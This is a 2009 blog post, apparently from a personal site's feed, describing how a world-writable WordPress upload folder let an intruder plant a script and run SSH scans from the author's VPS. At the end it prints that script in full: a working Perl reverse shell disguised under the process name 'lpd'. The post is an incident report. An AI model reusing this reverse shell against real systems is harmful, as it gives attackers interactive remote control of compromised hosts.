h4x3d.com » chmod http://h4x3d.com online portfolio of Julian Klewes Mon, 25 Jul 2011 13:18:32 +0000 en hourly 1 http://wordpress.org/?v=3.2.1 Latest downtime due to CHMOD 777 insecurity http://h4x3d.com/latest-downtime-due-to-chmod-777-insecurity/ http://h4x3d.com/latest-downtime-due-to-chmod-777-insecurity/#comments Mon, 02 Mar 2009 09:29:41 +0000 jez http://www.h4x3d.com/latest-downtime-due-to-chmod-777-insecurity/ exploit, random image however

Last time this sort of odd situation occured was way back in 2003 when I had my h4x3d.com website(s) hosted in Germany. People were clueless, but level3 administrators figured it out. WordPress requires some folders to be CHMODDED to 777, read,write, execute all access basically. One of those folders is the wp-content/upload folder. Different programmes, because not only wordpress is to “blame”, such as coppermine require similar settings for full functionality.

Anyway – someone from switzerland (bless the logs) had uploaded a perl script to one of the domains and was running excessive ssh scans. This was also why the VPS slowed down and became unresponsive. Since I was not able to restart it manually, I got in contact with my new VPS support at SolarVPS – they identified the scans and with my CHMOD 777 clue dropped in, some rootkit scans and other audits they were able to chuck out those unwanted visitors and files within an hour.

This is frankly speaking a support everyone is looking for. At zone.net one had varying support quality due to apparent offshoring of support to people that had no clue and merely redirected requests to the level3 techs. It seems like level3 techs reside at solarvps, else I wonder how they were able to almost instantianiously sort out my problems. I will have to find a solution to the upload folder problem, eventually move it outside the httpdocs? Any advice or comments?

Below you find one of the scripts that was used to call home and cause havoc, I believe this is only the “gateway” and “door opener” for more destructive commands to be executed:

c.txt
#!/usr/bin/perl
use Socket;
$cmd="lpd";
$system='/bin/sh -i';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

]]> http://h4x3d.com/latest-downtime-due-to-chmod-777-insecurity/feed/ 0